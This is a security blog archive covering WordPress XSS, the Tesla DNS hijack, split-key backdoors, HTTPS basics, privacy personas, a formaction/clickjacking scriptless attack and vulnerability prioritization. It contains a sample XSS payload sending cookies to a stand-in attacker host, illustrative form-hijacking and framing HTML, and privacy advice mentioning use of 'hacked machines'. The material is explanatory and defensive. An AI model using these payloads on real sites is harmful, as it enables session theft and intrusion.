Category Archives: Technical Insight

#HackerKast 33: WordPress Core XSS, Spoof Email Tanks Stock, Tesla Defacement via DNS Hack, 451 Status Code, MS15-034 Microsoft Vulnerability

Hey All! Thanks for checking out this week’s HackerKast! We’re all back and recovering from RSA and my feet still hurt.

Starting off with This Week In WordPress Sucks™, we’ve got a vulnerability in WordPress core this time. This is usually not the case, as core has been gone over several times with a fine-toothed comb, but some persistent XSS in core comment functionality popped up anyway. Also, as per usual, a few hundred plugins were vulnerable to an XSS found in two different frequently used functions that were poorly documented. The core issue has already been patched, but it is up to administrators of WordPress installs to race to get the patch installed.
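The general defense against stored XSS like this is output encoding. Here is a minimal sketch (illustrative Python, not the actual WordPress patch) showing how encoding HTML metacharacters renders an injected script inert; the `render_comment` helper is hypothetical:

```python
import html

def render_comment(comment_text: str) -> str:
    # Encode HTML metacharacters so injected markup is displayed
    # as inert text rather than parsed and executed by the browser.
    return '<p class="comment">' + html.escape(comment_text, quote=True) + "</p>"

malicious = '<script>document.location="//evil.example/?c="+document.cookie</script>'
print(render_comment(malicious))
# The <script> tag is emitted as &lt;script&gt;... and never executes.
```

Real frameworks layer this with sanitization and context-aware encoding, but the principle is the same: untrusted comment text must never reach the page as raw markup.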

Next, in silly-things-that-affect-the-stock-market news, Italy’s 2nd largest bank had a hoax email go out pretending to be the CEO resigning. Within moments, the stock took a huge dive before coming back up once everyone realized it was a hoax. We’ve seen this before a few times, notably the time the Associated Press Twitter account was hacked and tweeted about a bomb at the White House, which caused the entire stock market to take a dive for a few minutes. This all points to the fact that there are automated stock trading systems out there making decisions based off of social media and news information.

We had a little chat about the recent problem over at Tesla where their homepage was “defaced”. This wasn’t actually a defacement of any servers on their end; the attackers went after the recently popular low-hanging fruit of DNS providers. Once the DNS provider was owned, the homepage was redirected along with the MX records, allowing emails to be rerouted to the attackers. With this email rerouting in place, they then sent out some Twitter password reset emails, which allowed them to take over the social media accounts. What Robert and I touched on at the end here is that Tesla was lucky that this was all for the lulz, because that email rerouting, if done quietly, could’ve been silently MITMing the company’s emails for some time before anybody noticed. Scary stuff, considering how severe a compromise of your DNS provider can be.

A new status code has been proposed for the HTTP standard for the purpose of indicating a legally related block. Instead of just a 404, the browser would present a 451, meaning the content is restricted for legal reasons, of which there can be any number. Most commonly this would show up for the geolocation-related content blocks that tons of Netflix users are all too aware of.

Lastly, MS15-034 came out, a buffer overflow vulnerability in Microsoft’s IIS servers. Of course Robert couldn’t help himself and wrote a snippet of exploit code. Then, in This Week In RSnake Puts Something Dangerous On Social Media™, he posted this code to Twitter for people to play with, since the bug is remotely exploitable. We’re toying with a possible demo we could do of this for you all, but it might take some tinkering to make it interesting.

Thanks for listening! Check us out on iTunes if you want an audio-only version for your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay


XSS 0day in WordPress Core
Many WordPress Plugins Found Vulnerable to XSS
Fake Email Regarding CEO Resignation Tanks Stock
Tesla’s DNS and Twitter Account Hacked
New HTTP “Legally Restricted” Status Code Proposed
MS15-034 Buffer Overflow in Microsoft HTTP pt 1.
MS15-034 Buffer Overflow in Microsoft HTTP pt 2.
MS15-034 Buffer Overflow in Microsoft HTTP pt 3.

Notable stories this week that didn’t make the cut:

Thirty Meter Telescope Gets DDoS’d
Google’s April Fools Joke Actually Made Users Less Secure
Extremely Hackable eVoting Machine
Security Expert Pulled Off Flight by FBI After Exposing Airline Security Flaws
Senate Proposes Re-classifying Certain Uses of Software/Hardware as “Fair Use” and Exempt from DMCA
Navy Announces It Will Stop Buying Manned Aircraft
“Better Presentation of URLs in Search” Should Read “Removal of URLs In Search”
“The Real Deal” DarkNet 0Day Auction

#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

Speaking of Government Backdoors

After Alex Stamos’ stand-off with Admiral Mike Rogers, I got to thinking about what the Admiral must have meant when he insisted that government “front doors” were technically possible to create in a way that didn’t give the government ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain why that is a bad idea and propose a technically less dangerous one.

Barring any conversations about the ethics, the legal conundrums, the loss of trust, the weakening of freedoms, the chilling effect, or the future where we have to provide similar access to any government that asks, there are some legitimate reasons this design is bad. First a brief primer on how split-keys work.

Let’s take a simple encryption algorithm that just uses the password “Will Wheaton” to decrypt the plaintext. Now let’s say government agency A (the FBI/NSA or some similar organization) has access to the first half of the password, “Will”. “Will Wheaton” is a very weak password to begin with, but it’s made significantly weaker when one party knows at least half of the secret. It gets worse, though. Let’s say government agency B (the FISA court) has the second half of the password, “Wheaton”. Eventually the two halves need to be combined somewhere: a physical place where both halves of the password are typed in at the same time. Let’s call it a SCIF for argument’s sake.

In this example the SCIF is now the one place where all secrets go, which makes it a prime target to attack. Both parties can now see the data, instead of just one, and there may be situations where truly only one party should see it. And if the password is the same for every piece of encrypted information across all conversations, abuse is practically guaranteed once both halves are known: not only is the original encryption significantly easier to break because each party holds half the key material, but there is now a single place where the two halves must be combined, and that place is far more likely to be abused.
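To put a rough number on how much splitting the secret helps an attacker, here is a back-of-the-envelope sketch; the password length and alphabet size are illustrative assumptions, not figures from the post:

```python
# Toy arithmetic: how much easier brute force gets when one party
# already holds half the secret. Assumes a 12-character password
# drawn from a 64-symbol alphabet (hypothetical numbers).
alphabet = 64
length = 12

full_space = alphabet ** length          # attacker knows nothing
half_space = alphabet ** (length // 2)   # attacker already holds one half

print(f"full search space:        {full_space:.3e}")
print(f"with half the key known:  {half_space:.3e}")
print(f"work factor reduced by:   {full_space // half_space:,}x")
```

The search space shrinks from 64^12 to 64^6 guesses: the exponent is cut in half, which in practice turns an infeasible brute force into a trivial one.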

What happens when access to that user’s data is no longer deemed useful? Does the key simply stop working? What if they find out they were mistaken and the data they were looking at is benign? Is there a way to disable their password? No – that’s not how passwords or keys work when they have to work everywhere, all the time. All they can do is tell Apple, or Google, or whoever created the backdoor, to change the user’s keys and/or create a different backdoor password. That’s one of the major drawbacks of this model. It could also inadvertently tip off the suspect if they notice a new key being issued, depending on how it was implemented.

Now let’s take a slightly different scenario where Apple/Google had a rolling window where passwords changed every day, say. One day it was “Will Wheaton” the next it was “Darth Vader” and so on. That way the FBI/NSA and the FISA courts could subpoena any piece of information but it had to be marked with a certain time period (say ten days and they would use their corresponding 10 keys split into two parts each for a grand total of 20 key-halves). That way, they only had access to certain pieces of information and only for that one conversation, and nothing after that time period. That has a better chance of being successful, but still relies on the parties to come together at some point and allows them both to see the resultant classified material.

A more useful approach would be to have four sets of keys for each time-slice of one day. Keys 1 and 2 would belong to the FBI/NSA and Keys 3 and 4 to the FISA court. Key 1 would decrypt to a blob of further encrypted material that would only be decrypted fully by Key 3 (think of Key 1 as the outer layer of an onion and Key 3 the inner layer needed to get to the center). Likewise, Key 4 would decrypt a blob of encrypted material that could only be fully decrypted by Key 2. That way you could guarantee that neither individual key could be subverted to fully decrypt without the other party’s involvement. It would also allow either or both to see the resultant material should they need it, but not without each other’s approval. And it would guarantee that the key material couldn’t be abused beyond the time slice for the conversation in question.

So here is how it would break down. The FBI/NSA ask FISA for approval to decrypt User A’s conversation with User B. FISA agrees, and the FBI/NSA request that Apple/Google give them the time slices for Tuesday and Wednesday. Apple/Google respond with conversation numbers 1234 and 1235 and the corresponding blobs of encrypted text (if the FBI/NSA don’t already have them). The FBI/NSA request that FISA decrypt the blobs with Key 4(Tuesday) and Key 4(Wednesday) corresponding to conversations 1234 and 1235. FISA returns two encrypted blobs that won’t be useful until the FBI/NSA apply their Key 2(Tuesday) and Key 2(Wednesday) for the same time slices and conversations. The FBI/NSA decrypt the final encrypted blobs and are able to read the conversation. At this point Apple/Google know nothing about the data, only that it was subpoenaed. The FISA court was aware of and complicit in the decryption but never saw the data, and the FBI/NSA got only the data they requested and nothing more. If the court also needs to see the data, the corresponding Keys 1 and 3 are used for the same time slices against the corresponding blobs of data.
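The layered (“onion”) decryption at the heart of this scheme can be sketched in a few lines of Python. This is a toy illustration of the key layering only: the XOR keystream below stands in for a real cipher and must not be used for actual encryption, and the key names are hypothetical labels following the post’s scheme.

```python
import hashlib

def keystream_xor(key: bytes, data: bytes) -> bytes:
    # Toy XOR "cipher" keyed by SHA-256 in counter mode. It stands in
    # for a real cipher purely to illustrate the layering; NOT secure.
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream.extend(hashlib.sha256(key + counter.to_bytes(8, "big")).digest())
        counter += 1
    return bytes(b ^ k for b, k in zip(data, stream))

# Hypothetical per-day, per-conversation keys: Keys 1 and 2 held by
# the FBI/NSA, Keys 3 and 4 by the FISA court, as in the post.
k1, k2, k3, k4 = b"key1-tue", b"key2-tue", b"key3-tue", b"key4-tue"

plaintext = b"conversation 1234, Tuesday"

# The provider escrows the message under two layers:
# outer layer under Key 4 (court), inner layer under Key 2 (agency).
blob = keystream_xor(k4, keystream_xor(k2, plaintext))

# FISA peels the outer layer with Key 4 but still sees only ciphertext...
partially = keystream_xor(k4, blob)
assert partially != plaintext

# ...and only the FBI/NSA's Key 2 recovers the conversation.
recovered = keystream_xor(k2, partially)
assert recovered == plaintext
```

The point the layering makes concrete: neither party’s key alone yields plaintext, so each decryption requires both parties’ active participation for that one time slice.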

Of course this is a huge burden, because now each user has four keys that need to be created for each day. Assuming there are 3 billion people in the world, and they use probably 3 different types of chatting systems per day, that would require something like 36 billion keys to be shared by two government agencies (18 billion each) per day. That’s a lot. Not to mention that keys wouldn’t just be short passwords, but presumably something like x509 or GPG certs, which can be quite large. And that also assumes that they can somehow get access to those keys in a way that the other (or malicious 3rd parties) can’t intercept or see. The devil lies deep in those details.

Ultimately though, I think Alex Stamos is right to press the government. Our industry thrives on trust, and if people believe that the government is spying on them, they are significantly less likely to transact or act normally – as themselves. Even if we can solve for the technical problems we have to be extremely thoughtful on how or even if we deploy it at all. Even when one’s only crime is one of thought or ideas, this kind of system dramatically increases the likelihood that the idea of freedom of expression will be lost in the annals of time. We all have to decide: would we rather have security in the form of big brother, or would we rather have privacy? We can’t have both, so we had better make up our minds now before the decisions are made on our behalf.

Please check out a similar and wonderfully written post by Matthew Green as well.

Web Security for the Tech-Impaired: The Importance of the ’S’

There’s one little letter that has huge importance when you’re logging into sites or buying your favorite items: it’s the letter ’S’. The ’s’ I’m referring to is the ’S’ in HTTPS. You may never have seen the ’S’ before in your web browser, or you may have seen it and never realized its importance. You may know it as that thing that gets added before the website you type in. What is its meaning? Why is it important? You shall find these answers in this post!

HTTP and HTTPS are referred to as ‘protocols’. In essence, these protocols define how your computer will talk to another computer. As you browse the web, you may notice that some sites use HTTP, while others use HTTPS. If you bring up CNN’s home page you’ll notice that the URL bar either shows http in front of the URL or just the address itself. This shows that the site is using the HTTP protocol to communicate. HTTP is a non-secure way of transmitting data from your computer to the website. Data sent over the HTTP protocol can be intercepted and read at any point between you and the website’s computer. This is what’s known as a ‘man-in-the-middle’ (MITM) attack. A person listening in on the virtual conversation between your computer and the website’s computer can look at all the data being sent. This isn’t a big deal if you’re looking at articles on CNN or searching for content on Wikipedia, but what if you log in to a site or buy something from an online store? You certainly don’t want the bad guys to know your username and password or your credit card number, so how do you protect yourself?

This is where the mighty ’S’ comes to the rescue. The protocol HTTPS is a way of securely sending data between your computer and the website you are interacting with. If a site is using HTTPS you’ll notice the https in front of the URL. In more modern and up-to-date browsers, you’ll likely see the HTTPS colored in either green or red, along with a lock icon. The green text with the lock icon indicates that you’re communicating securely with this website and everything looks to be going well.

If the https is red, there is probably some type of issue with the site security. It may be that the site’s certificate is out of date or invalid, or it may be that the site includes insecure third-party content, or there may be other issues. In any case, it is always safest not to proceed with a transaction that involves information you would like to keep secure if the HTTPS and lock icon are not green.

HTTPS uses a complicated system to encrypt the data you send to the website and vice versa. A bad guy who is performing an MITM attack will still see the conversation between you and the website, but it will be completely incoherent, like listening to a conversation in a language that’s been made up by the two people talking. Anytime you are doing anything that requires a login, credit card number, social security numbers, or ANY private data, you want to make sure that you see that HTTPS protocol, and if you have the benefit of modern browsers, that the green lock icon is present. NEVER log in or give any sensitive information to a site that does not communicate over HTTPS.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities being undertaken as part of application security programs and we were impressed to see that 87% of the respondents perform static analysis. 32% of them perform it with each major release and 13% are performing it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibility into third-party software service providers’ and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion, and perhaps intentional fear, uncertainty and doubt (FUD), in this area. The way you go about testing third-party software should mirror the way you go about testing your own software. Binary analysis, done in the belief that it avoids exposing your Intellectual Property (IP), is where the real question lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort, is no real obstacle. Tools such as ILSpy and Show My Code are freely and widely available. Sharing your binaries in an attempt to protect your Intellectual Property actually ends up exposing 100% of your IP.

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property. from WhiteHat Security on Vimeo.

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries. That means being careful never to turn on the compilation options, which some vendors require, that make binary review possible. At a very minimum, it means ensuring those same binaries never get uploaded to production, where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP you need to make certain your binaries don’t fall into the wrong hands, because inside those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

The Perils of Privacy Personas

Privacy is a complex beast, and depending on who you talk to, you get very different opinions of what is required to be private online. Some people really don’t care, and others really do. It just depends on the reasons why they care and the lengths they are both willing and able to go through to protect that privacy. This is a brief run-down on some various persona types. I’m sure people can come up with others, but this is a sampling of the kinds of people I have run across.

Alice (The Willfully Ignorant Consumer)

  • How Alice talks about online privacy: “I don’t have anything to hide.”
  • Alice’s perspective: Alice doesn’t see the issues with online advertising, governmental spying and doesn’t care who reads her email, what people do with her information, etc. She may, in the back of her mind, know that there are things she has to hide but she refuses to acknowledge it. She is not upset by invasive marketing, and feels the world will treat her the same way she treats it. She’s unwilling to do anything to protect herself, or learn anything beyond what she already knows. She’s much more interested in other things and doesn’t think it’s worth the time to protect herself. She will give people her password, because she denies the possibility of danger. She is a danger to all around her who would entrust her with any secrets.
  • Advice for Alice: Alice should do nothing. All of the terrible things that could happen to her don’t seem to matter to her, even when she is advised of the risks. This type of user can actually be embodied by Microsoft’s research paper So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users, which is to say that spending time on security has a negative financial tradeoff for most of the population when taken in a vacuum where one person’s security does not impact another’s.

Bob (The Risk Taker)

  • How Bob talks about online privacy: “I know I shouldn’t do X but it’s so convenient.”
  • Bob’s perspective: Bob knows that bad things do happen, and is even somewhat concerned about them. However, he knows he doesn’t know enough to protect himself and is more concerned about usability and convenience. He feels that the more he does to protect himself, the more inconvenient life is. He can be summed up with the term “Carpe Diem.” Every one of his passwords is the same. He chooses weak security questions. He doesn’t use password managers. He clicks through any warning he sees. He downloads all of the programs he finds regardless of origin. He interacts on every social media site with a laissez-faire attitude.
  • Advice for Bob: He should pick email/hosting providers and vendors that naturally take his privacy and security seriously. Beyond that, there’s not much else he would be willing to change.

Cathy (The Average Consumer)

  • How Cathy talks about online privacy: “This whole Internet thing is terrifying, but really, what can I do? Tax preparation software, my utilities and email are essential. I can’t just leave the Internet.”
  • Cathy’s perspective: Cathy knows that the Internet is a scary place. Perhaps she or one of her friends has already been hacked. She would pick more secure and private options, but simply has no idea where to start. Everyone says she should take her security and privacy seriously, but how and who should she trust to give her the best advice? Advertisers are untrustworthy, security companies seem to get hacked all the time – nothing seems secure. It’s almost paralyzing. She follows whatever best practices she can find, but doesn’t even know where to begin unless it shows up in whatever publications she reads and happens to trust.
  • Advice for Cathy: Cathy should try to find options that have gone through rigorous third-party testing by asking for certificates of attestation, or attempt to self-host where possible (e.g. local copies of tax software versus Internet-based versions), and follow all best practices for two-factor authentication. She should use ad-blocking software and VPNs, and log out of anything sensitive when finished. Ideally she should use a second browser for banking versus general Internet activities. She shouldn’t click on links in emails, shouldn’t install any unknown applications and shouldn’t even download trustworthy applications from untrustworthy websites. If a site is unknown, has a bad or nonexistent BBB rating or seems to not look “right”, she should avoid it. It may have been hacked or taken over. She should also do reputation checking on the site using Web of Trust or similar tools. She should look for the lock in her browser to make sure she is using SSL/TLS. She shouldn’t use public wifi connections. She should install all updates for every piece of software that is already on her computer, uninstall anything she doesn’t need and make sure all unnecessary services are disabled. If anything looks suspicious, she should ask a more technical person for help, and make sure she has backups of everything in the case of compromise.

Dave (The Paranoid Reporter)

  • How Dave thinks about online privacy: “I know the government is capable of just about anything. So I’ll do what I can to protect my sources, insofar as it still enables me to do my job.”
  • Dave’s perspective: Dave is vaguely aware of some of the programs the various government agencies have in place. He may or may not be aware that other governments are just as interested in his information as the US government. Therefore, he places trust in poor places, mistakenly thinking he is somehow protected by geography or rule of law. He will go out of his way to install encryption software, and possibly some browser security and privacy plugins/add-ons, such as ad-blocking software like Disconnect or maybe even something more draconian like NoScript. He’s downloaded Tor once to check it out, and has a PGP/GPG key that no one has ever used posted on his website. He relies heavily on his IT department to secure his computer. But he uses all social media, chats with friends, has an unsecured phone and still uses third party webmail for most things.
  • Advice for Dave: For the most part, Dave is woefully unequipped to handle sensitive information online. His phone(s) are easily tapped, his email is easily subpoenaed and his social media is easily crawled/monitored. Also, his whereabouts are always monitored in several different ways through his phone and social media. He is at risk of putting people’s lives in danger due to how he operates. He needs to have complete isolation and compartmentalization of his two lives. Meaning, his work computer and personal email/social presence should not intertwine. All sensitive stuff should be done through anonymous networks, and using heavily encrypted data that ideally becomes useless after a certain period of time. He should be using burner phones and he should be avoiding any easily discernible patterns when meeting with sources in person or talking to sources over the Internet.

Eve (The Political Dissident)

  • How Eve thinks about online privacy: “What I’m doing is life or death. Everyone wants to know who I am. It’s not paranoia if you’re right.”
  • Eve’s perspective: Eve knows the full breadth of government surveillance from all angles. She’s incredibly tuned in to how the Internet is effectively always spying on her traffic. Her life and the lives of her friends and family are at risk because of what she is working on. She cannot rely on anyone she knows to help her, because doing so would put them, and ultimately herself, at risk in the process. She is well read on all topics of Internet security and privacy and she takes absolutely every last precaution to protect her identity.
  • Advice for Eve: Eve needs to go to incredible lengths to use false identities to build up personas so that nothing is ever in her name. There should always be a fall-back secondary persona (also known as a backstop) that will take the fall if her primary persona is ever de-anonymized, instead of her actual identity. She should never connect to the Internet from her own house, but rather travel to random destinations and connect to wifi at distances that won’t make it visually obvious. Everything she does should be encrypted. Her operating system should be using plausible deniability (e.g. VeraCrypt) and she should actually have a plausibly deniable reason for it to be enabled. She should use a VPN or hacked machines before surfing through a stripped-down version of Tails, running various plugins that ensure that her browser is incapable of doing her harm. That includes plugins like NoScript, Request Policy, HTTPS Everywhere, etc. She should never go to the same wifi connection twice, and should use different modes of transportation whenever possible. She should never use her own credit card, but instead trade in various forms of online crypto-currencies, pre-paid credit cards, physical cash and barter/trade. She should use anonymous remailers and avoid using the same email address more than once. She should regularly destroy all evidence of her actions before returning to any place where she might be recognized. She should avoid wearing recognizable outfits, and cover her face as much as possible without drawing attention. She should never carry a phone, but if she must, it should have the battery removed. Her voice should never be transmitted due to voice-prints and phone-line/background noise forensics. All of her IDs should be put into a Faraday wallet. She should never create any social media accounts under her own name, never upload a picture of herself or her surroundings, and never talk to anyone she knows personally while surfing online.
She should avoid using any jargon, slang or words that are unique to her location. She should never talk about where she is, where she’s from or where she’s going. She should never tell anyone in real life what she’s doing and she should always have a cover story for every action she takes.

I think one of the biggest problems in our industry is the fact that we tend to give generic one-size-fits-all privacy advice. As you can see above, this sampling of various types of people isn’t perfect, but it never could be. People’s backgrounds are so diverse and varied that it would be impossible to precisely fit any one person into any bucket. Therefore privacy advice must be tailored to people’s ability to understand it, their interest in protecting themselves, and the actual threat they’re facing.

Also, we are often talking at odds with regard to privacy versus security. Even if we didn’t have to worry about the intentions of those giving advice, we still can’t necessarily rely on the advice itself. Nor can we rely on the advice being well taken by the person we are giving it to. One party might fully believe that they’re doing all they need to be doing, while in fact making it extremely dangerous for those around them who have higher security requirements.

Anything could be a factor in people’s needs/interest/abilities with regards to privacy – age, sex, race, religion, cultural differences, philosophies, their location, which government they agree with, who they’re related to, how much money they have, etc. Who knows how any of those things might impact their privacy concerns and needs? If we give people one-size-fits-all privacy advice it is guaranteed to be a bad fit for most people.

#HackerKast 29 Bonus Round: Formaction Scriptless Attack

Today on HackerKast, Matt and I discussed something called a Formaction Scriptless Attack. Content Security Policy (CSP) has put a big theoretical dent in cross-site scripting. I say theoretical because relatively few sites are taking advantage of it yet; but even when it is implemented to prevent JavaScript from loading on the page, that doesn’t necessarily remove the possibility of attack via HTML injection.

For example, let’s say you have a site that has CSP set up to prevent inline and remote JavaScript from loading, using the nonce feature, which requires all script tags to include the nonce before they will load. However the nonce is generated (ideally it’s a fresh, unpredictable value per response), the point is that the attacker doesn’t know it. But what the attacker really wants to do is submit some form. Now the form itself might protect itself in a different way, using a server-generated nonce (a second one) to prevent cross-site request forgeries. Barring any side-channel attacks, MITM attacks or attacks against the server itself, it seems like this might stop you in your tracks.

HTML5 to the rescue! Let’s say the form has an id set of id=”form1″. HTML5 has a feature where any input field anywhere on the page (yes, even outside of the form block) can declare that it belongs to any form using the “form” attribute (e.g. form=”form1″). That might be somewhat bad, because perhaps I can include an extra form field and make the user do something they didn’t mean to do. But worse yet, HTML5 also has a feature called formaction. Formaction allows me to change the location to which the form is being submitted.

So if the attacker submits an input field that associates itself with the form that contains the secret nonce and also carries a formaction directive pointing the form to the attacker’s website, it’s pretty much game over if the user clicks on that button. So now the trick is to get the user to click on the button. Oh, if only there was a way to get people to click on arbitrary places on a page from another domain… oh wait! Clickjacking!

So if the site is using CSP but not using X-Frame-Options or similar techniques to prevent the site from being framed, the attacker can frame the page and force the user to click on the evil button whose formaction points the form back to the attacker’s site. The attacker then takes that nonce, creates a page that automatically replays it, and forces a CSRF request with the secret nonce. So much for CSRF protection! Here is the original vulnerable page and here is the clickjacked version of it with semi-opacity enabled to make it easier to see (tested in Firefox only).
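A bare-bones version of the framing trick might look like this (the URLs and pixel offsets are invented; a real attack would drop the opacity to near zero instead of the semi-visible value used for demos):

```html
<!-- Attacker's page: the target is framed nearly invisibly on top of a
     decoy button, so a click on the decoy lands on the injected submit
     button inside the frame. -->
<style>
  iframe  { position: absolute; top: 0; left: 0;
            width: 600px; height: 400px; opacity: 0.05; z-index: 2; }
  button  { position: absolute; top: 120px; left: 80px; z-index: 1; }
</style>
<button>Play video</button>
<iframe src="https://victim.example/page-with-injected-input"></iframe>
```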

Scriptless attacks aren’t new; Mario Heiderich, for example, has been working on them for years. But they are deadly. It’s not quite the same thing as a cross-domain read in this case, but it has the same effect: allowing the attacker to read information from the target domain for use in an attack. I highly recommend using X-Frame-Options on all your pages, but that only stops one form of the attack; it’s still possible to social engineer people, and so on. Why devs need to associate input fields with forms outside of the form block is still a bit of a mystery to me, and why they need to change the form action after the fact, even overriding the original location, is also a puzzle. But with every new feature comes a new way to abuse it. HTML5 is an interesting beast, that’s for sure!

Update: As mentioned on Twitter, you can use CSP to block formaction with the form-action directive, but you have to do so explicitly or the attack will still work alongside your other CSP rules. You can also do the equivalent of X-Frame-Options in CSP with the frame-ancestors directive. So a properly configured CSP might actually save you – very cool!
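Concretely, a policy that closes both holes might look something like this one-liner (the nonce value is illustrative):

```http
Content-Security-Policy: script-src 'nonce-d3adb33f'; form-action 'self'; frame-ancestors 'none'
```

Here form-action restricts where any form on the page may submit, and frame-ancestors forbids framing entirely, covering the clickjacking half of the attack.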

Security and the SDLC: Integrating application security in developer environments

As we wind down the end of the year, I thought it would be good to share some big-picture thinking about vuln classification and prioritization. There are two commonly overlooked issues when enterprises attempt to secure themselves:

1. Once a company finds out about a vulnerability, how do they track it? A company can end up with tens of thousands of vulnerabilities or more if their environment is large and complex enough. And we’re not talking about false positives – I mean real, remotely exploitable vulns.
2. How do you ensure the vulnerabilities actually get fixed? Just because you find a vulnerability doesn’t mean your developers know about it, or know to prioritize it, etc. And what if they just claim that it’s fixed…?

The problem is scale. Any off-the-shelf scanner works fine when you’re talking about one app, or a few apps. Where they fall down is when they have to scan hundreds or thousands of apps. Not only do companies lack the manpower to manage all of those scans and the associated credentials, but even if they had it, they’d be left with a huge homework assignment: transcribing thousands of vulns into some system the developers know to look at.

Integration with some sort of case-management system, therefore, is a critical component of SDLC (software/security development life cycle) integration. It’s not just a nice-to-have checklist item: if you aren’t doing it, vulns are getting lost, and that’s just a fact. Worse yet, without bi-directional communication, vulns can get closed prematurely and you’ll end up opening a new ticket every time you scan. Knowing which ticket corresponds to which scanner finding lets you see when a developer just wants to close a few tickets before 5 PM on Friday; when those vulns all re-open on the next scan run, you’ll know who is trying to game the system, and therefore which developer/QA engineers are leaving you unnecessarily vulnerable.
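As a sketch of what that bi-directional matching looks like in practice (the field names and fingerprint scheme below are invented for illustration, not any particular product’s API):

```javascript
// Sketch: reconcile new scan findings with previously filed tickets.
// A stable fingerprint maps a re-discovered vuln back to its existing
// ticket instead of opening a duplicate on every scan run, and flags
// tickets that were closed while the scanner still sees the vuln.
function reconcile(findings, tickets) {
  const byFingerprint = new Map(tickets.map(t => [t.fingerprint, t]));
  for (const f of findings) {
    const fp = `${f.site}|${f.vulnClass}|${f.location}`;
    const ticket = byFingerprint.get(fp);
    if (!ticket) {
      tickets.push({ fingerprint: fp, status: "open" }); // genuinely new
    } else if (ticket.status === "closed") {
      ticket.status = "reopened"; // "fixed" on Friday, still exploitable
    }
  }
  return tickets;
}
```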

Then you have the whole issue of vuln priority. Without knowing something about the systems in question, you could inadvertently prioritize a vuln on an internal device ahead of something in production. Scanners are ultimately dumb (yes, it’s true, no matter how much we like to pretend they’re not), and they need to be told how to think about the environment. If your scanner can’t take in information from systems like Archer or similar GRC (governance, risk and compliance) tools to learn how important a site is, it’s entirely possible you’re fixing the wrong issues in the wrong order, putting your company unnecessarily at risk and wasting resources in the process.

There is a real art to making sure you are looking at the correct vulns. The more you think about it, the more you’ll probably agree this is the right path forward – adding in all sorts of additional/useful criteria. For instance, knowing how much a site is getting attacked is useful. Knowing which sites take and store PII (personally identifiable information) is useful. Knowing which sites live in the DMZ (de-militarized zone) together is useful. All of those things can help you prioritize and stop wasting time on vulns that either don’t matter because they’re nearly impossible to exploit or are less critical because they are protected by other controls.
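A toy version of that kind of context-aware scoring might look like this; the weights and field names are entirely invented, and a real system would tune them per environment:

```javascript
// Sketch: weight a scanner's raw severity by business context.
function priorityScore(vuln, asset) {
  let score = vuln.severity;                   // e.g. 1-10 from the scanner
  if (asset.inProduction)        score *= 2;   // production beats internal
  if (asset.storesPII)           score *= 1.5; // regulated data raises stakes
  if (asset.attacksPerDay > 100) score *= 1.5; // actively probed sites first
  if (asset.behindWAF)           score *= 0.5; // compensating control exists
  return score;
}
```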

There’s obviously a lot more to it, but this should be a good primer on how to start thinking about vulns. If you want more information, we have several webinars that go into this in more gory detail. Either way, if you aren’t spending time identifying your assets and prioritizing them, you’re wasting time and money – and who’s got that?

Top 10 Web Hacking Techniques of 2014

UPDATE – 3/19, 11:00 a.m. PT We have our Top 10 list, folks! After weeks of coordination, research, voting by the community and judging by our esteemed panelists, we are pleased to announce our Top 10 List of Web Hacking Techniques for 2014:

  1. Heartbleed
  2. ShellShock
  3. Poodle
  4. Rosetta Flash
  5. Residential Gateway “Misfortune Cookie”
  6. Hacking PayPal Accounts with 1 Click
  7. Google Two-Factor Authentication Bypass
  8. Apache Struts ClassLoader Manipulation Remote Code Execution and Blog Post
  9. Facebook hosted DDOS with notes app
  10. Covert Timing Channels based on HTTP Cache Headers

Congratulations to all those that made the list! Your research contributions are admired and should be respected. And a special thanks to everyone that voted or shared feedback. Also, for anyone that would be interested in learning more about this list, Johnathan Kuskos and I will be presenting the list at RSA in San Francisco next month. Come check it out!

Agree with the list? Disagree? Share your comments below.

Every year the security community produces a stunning number of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, we are solely focused on new and creative methods of Web-based attack. Now in its ninth year, the Top 10 Web Hacking Techniques list encourages information sharing, provides a centralized knowledge base, and recognizes researchers who contribute excellent work. Past Top 10s and the number of new attack techniques discovered in each year:

2006 (65), 2007 (83), 2008 (70), 2009 (82), 2010 (69), 2011 (51), 2012 (56) and 2013 (31).

Phase 1: Open community submissions [Jan 7-Jan 30]
Comment on this post with your submissions between now and Jan 30. Submissions will be reviewed and verified.

Phase 2: Open community voting for the final 15 [Feb 2-Feb 20]
